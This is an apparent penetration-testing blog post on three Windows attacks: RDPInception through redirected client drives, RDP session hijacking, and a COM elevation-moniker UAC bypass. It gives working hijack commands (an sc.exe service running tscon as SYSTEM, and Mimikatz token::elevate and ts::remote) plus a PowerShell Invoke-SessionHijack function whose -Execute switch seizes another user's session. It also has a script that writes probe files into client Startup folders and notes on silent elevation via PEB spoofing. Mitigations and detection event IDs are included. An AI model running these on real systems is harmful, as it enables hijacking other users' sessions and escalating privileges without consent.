RDP Inception + RDP hijack + Bypass UAC (disable the firewall, copy files, execute files)

Nov 02, 2020
1. RDPInception

* Requires the user to redirect the C: drive when connecting over RDP (drive redirection is off by default, so the precondition is normally not met).
  With redirection on, the RDP client's C:\ is exposed on the RDP server as \\tsclient\c, which is what the attack writes to.

A direction for future work: RCE through RDP clipboard/printer redirection could make this attack applicable far more widely, since those channels are enabled by default.

https://www.anquanke.com/post/id/101525
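The check a practitioner wants before relying on this technique is whether the precondition actually holds. The script below is an added example, not code from the original post; the function names are my own. Run from inside an RDP session on the server, it probes every \\tsclient\<letter> share, lists the client-side Startup folders the attack would drop into (writing only a throw-away probe file that is removed immediately), and reads the fDisableCdm setting that disables client drive mapping, which is the corresponding mitigation.

```powershell
# Added example (not from the original post): test the RDPInception precondition
# from the server side of an RDP session. Function names are my own.

function Get-TsclientDrive {
    # Redirected client drives appear on the server as \\tsclient\<letter>.
    # The share only resolves inside a session whose client enabled drive
    # redirection, so probing all 26 letters is a complete test.
    foreach ($code in 97..122) {
        $letter = [char]$code
        $unc = "\\tsclient\$letter"
        if (Test-Path -LiteralPath $unc) {
            [pscustomobject]@{ Drive = "${letter}:"; Unc = $unc }
        }
    }
}

function Get-TsclientStartupFolder {
    # RDPInception plants a file in a Startup folder on the *client* so it runs
    # at that user's next logon. Report each profile's Startup folder and whether
    # our server-side user can write to it (probe file created, then deleted).
    param([Parameter(Mandatory)][string]$Unc)     # e.g. \\tsclient\c
    $profiles = Get-ChildItem -LiteralPath (Join-Path $Unc 'Users') -Directory -ErrorAction SilentlyContinue
    foreach ($p in $profiles) {
        $startup = Join-Path $p.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
        if (-not (Test-Path -LiteralPath $startup)) { continue }
        $writable = $false
        $probe = Join-Path $startup ([guid]::NewGuid().ToString() + '.tmp')
        try {
            New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
            Remove-Item -LiteralPath $probe -Force
            $writable = $true
        } catch { }
        [pscustomobject]@{ Profile = $p.Name; Startup = $startup; Writable = $writable }
    }
}

function Get-DriveRedirectionPolicy {
    # fDisableCdm = 1 turns client drive mapping off. Group Policy writes the
    # first key ("Do not allow drive redirection"); the second is the RDP-Tcp
    # listener's own setting. Either one blocks the attack.
    $keys = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    )
    foreach ($key in $keys) {
        $value = (Get-ItemProperty -Path $key -Name fDisableCdm -ErrorAction SilentlyContinue).fDisableCdm
        [pscustomobject]@{
            Key                     = $key
            fDisableCdm             = $value
            DriveRedirectionAllowed = ($value -ne 1)
        }
    }
}

# Usage, inside the RDP session ($env:SESSIONNAME is RDP-Tcp#N there):
Get-DriveRedirectionPolicy | Format-Table -AutoSize
Get-TsclientDrive | ForEach-Object { Get-TsclientStartupFolder -Unc $_.Unc } | Format-Table -AutoSize
```

If Get-TsclientDrive returns nothing, the session was opened without drive redirection and the attack has no channel; setting fDisableCdm to 1 on the server removes it for every session.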

2. RDP Hijack

List the sessions on the host (ID, session name, user, state):
query user

Method 1: run as SYSTEM
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#0"
net start sesshijack
Here 3 is the ID of the target session from query user and rdp-tcp#0 is the name of the attacker's own session. Because the service runs as LocalSystem, tscon attaches the target session to the attacker's desktop without the target user's credentials; the service itself "fails" to start (cmd.exe is not a real service) but tscon has already run by then. Disconnected sessions work as well as active ones.

Method 2: using Mimikatz
ts::sessions        // list sessions (same information as query user)
privilege::debug    // acquire SeDebugPrivilege
token::elevate      // impersonate a SYSTEM token, which is what lets tscon skip the password check
ts::remote /id:1    // connect session 1 to the current session, i.e. switch to its desktop

https://www.anquanke.com/post/id/101525
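Method 1 wrapped into something reusable, as an added example that is not code from the original post or from Mimikatz: parse the fixed-width `query user` output into objects, then build (and, with -Execute, run) the SYSTEM service that attaches a chosen session to our own. The function names, the -Execute switch and the sample `query user` lines are my own constructions.

```powershell
# Added example (not from the original post): the sc.exe/tscon hijack as a script.

function ConvertFrom-QueryUser {
    # Parse `query user` rows. A disconnected session has an empty SESSIONNAME,
    # so the regex anchors on the numeric ID that always precedes STATE.
    param([Parameter(Mandatory)][string[]]$Lines)   # header line + one row per session
    $pattern = '^[\s>](?<user>\S+)\s+(?:(?<session>\S+)\s+)?(?<id>\d+)\s+(?<state>\S+)'
    foreach ($line in ($Lines | Select-Object -Skip 1)) {
        if ($line -match $pattern) {
            [pscustomobject]@{
                Current = $line.StartsWith('>')   # '>' marks the session we are in
                User    = $Matches.user
                Session = $Matches.session        # $null for disconnected sessions
                Id      = [int]$Matches.id
                State   = $Matches.state
            }
        }
    }
}

function Invoke-SessionHijack {
    # Create a LocalSystem service whose "binary" is tscon. SYSTEM may connect
    # any session without a password; the target desktop replaces ours.
    # Note: in PowerShell `sc` is an alias for Set-Content, so sc.exe is required,
    # and sc.exe needs the space after "binpath=".
    param(
        [Parameter(Mandatory)][int]$TargetId,
        [string]$Destination = $env:SESSIONNAME,   # our own session, e.g. RDP-Tcp#0
        [string]$ServiceName = 'sesshijack',
        [switch]$Execute                           # without it, only the commands are returned
    )
    $bin = "cmd.exe /k tscon $TargetId /dest:$Destination"
    $commands = [pscustomobject]@{
        Create  = "sc.exe create $ServiceName binpath= `"$bin`""
        Start   = "sc.exe start $ServiceName"
        Cleanup = "sc.exe delete $ServiceName"
    }
    if ($Execute) {
        & sc.exe create $ServiceName binpath= $bin | Out-Null
        & sc.exe start $ServiceName | Out-Null   # reports an error: cmd.exe never signals "running", but tscon has executed
        & sc.exe delete $ServiceName | Out-Null  # leave no service behind
    }
    $commands
}

# Constructed sample of `query user` output (live: ConvertFrom-QueryUser -Lines (query user)):
$sample = @(
    ' USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME',
    '>attacker              rdp-tcp#0           3  Active          .  11/2/2020 10:00 AM',
    ' victim                                    2  Disc        1:23  11/2/2020 9:00 AM'
)
$sessions = ConvertFrom-QueryUser -Lines $sample
$sessions | Format-Table -AutoSize

# Pick a session that is not ours and show the commands that would hijack it
# (Invoke-SessionHijack -TargetId 2 -Destination 'rdp-tcp#0' -Execute does it for real, as SYSTEM/admin).
$target = $sessions | Where-Object { -not $_.Current } | Select-Object -First 1
Invoke-SessionHijack -TargetId $target.Id -Destination 'rdp-tcp#0'
```

For the sample above the Create command comes out as `sc.exe create sesshijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#0"`, i.e. the page's own command with the disconnected victim session as the target. On the defensive side this technique leaves two reliable traces: a System log event 7045 (service installed) whose image path contains tscon, and a Security event 4778 (session reconnected) for the victim's session with the attacker's client name.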

3. Bypass UAC

From the official documentation, creating an object through the COM Elevation Moniker places the following requirements on the COM class:

  1. The class is registered.
  2. It is registered under HKEY_LOCAL_MACHINE, which means administrator rights were needed to register it in the first place.
  3. Under HKEY_LOCAL_MACHINE\Software\Classes\CLSID three values must be present:
    {CLSID}, LocalizedString (REG_EXPAND_SZ): displayName
    {CLSID}\Elevation, IconReference (REG_EXPAND_SZ): applicationIcon
    {CLSID}\Elevation, Enabled (REG_DWORD): 1

COM interface used to copy files: IFileOperation

Conclusion: as long as the elevated COM object is created from (or from a process that masquerades as, e.g. by spoofing its image path in the PEB) a trusted Windows binary such as explorer.exe or powershell.exe, no UAC dialog is shown. This holds at the default UAC level ("Notify me only when apps try to make changes") for a user in the Administrators group; with UAC set to "Always notify" the prompt still appears.

https://github.com/3gstudent/Use-COM-objects-to-bypass-UAC
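Applied to a real host, the three registry requirements above become an inventory question: which classes on this machine carry Elevation\Enabled = 1, and is UAC configured so that a trusted caller gets them silently? The script below is an added example, my own code rather than the original post's or the linked repository's; the function names are mine. It enumerates the auto-elevating classes with their display name (LocalizedString), icon reference and hosting binary, and reads the ConsentPromptBehaviorAdmin value that decides whether the conclusion above applies.

```powershell
# Added example (not from the original post or 3gstudent's repository):
# inventory the COM classes that satisfy the elevation-moniker requirements.

function Get-AutoElevatedComClass {
    # Pass 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID' to cover 32-bit registrations.
    param([string]$ClsidRoot = 'HKLM:\SOFTWARE\Classes\CLSID')

    # Requirement 3: a {CLSID}\Elevation subkey whose Enabled (REG_DWORD) is 1.
    $elevationKeys = Get-Item -Path (Join-Path $ClsidRoot '*\Elevation') -ErrorAction SilentlyContinue
    foreach ($elev in $elevationKeys) {
        if ($elev.GetValue('Enabled') -ne 1) { continue }
        $clsidKey = Get-Item -LiteralPath $elev.PSParentPath

        # Hosting binary: LocalServer32 (out-of-process EXE) or InprocServer32 (DLL).
        $server = $null
        foreach ($sub in 'LocalServer32', 'InprocServer32') {
            $k = Get-Item -LiteralPath (Join-Path $clsidKey.PSPath $sub) -ErrorAction SilentlyContinue
            if ($k) { $server = $k.GetValue(''); break }   # default value of the subkey
        }

        [pscustomobject]@{
            Clsid           = $clsidKey.PSChildName
            LocalizedString = $clsidKey.GetValue('LocalizedString')   # "@dll,-id": the name UAC would display
            IconReference   = $elev.GetValue('IconReference')
            Server          = $server
        }
    }
}

function Get-UacAdminPromptLevel {
    # ConsentPromptBehaviorAdmin: 5 (default) and 4 prompt only for non-Windows
    # binaries, 0 never prompts, 2 is "Always notify", 1 and 3 prompt for
    # everything. EnableLUA = 0 means UAC is off entirely.
    $p = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                     = $p.EnableLUA
        ConsentPromptBehaviorAdmin    = $p.ConsentPromptBehaviorAdmin
        TrustedCallerElevatesSilently = ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -in @(0, 4, 5))
    }
}

# Usage:
Get-UacAdminPromptLevel
Get-AutoElevatedComClass | Sort-Object Server | Format-Table Clsid, LocalizedString, Server -AutoSize
```

On a stock Windows 10 install the list includes the FileOperation class ({3AD05575-8857-4850-9277-11B85BDB8E09}, hosted by explorer.exe), which is the object behind the IFileOperation file-copy step above. If TrustedCallerElevatesSilently is $false, the moniker still works but the user sees the consent dialog, so the bypass degrades to an ordinary elevation request.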
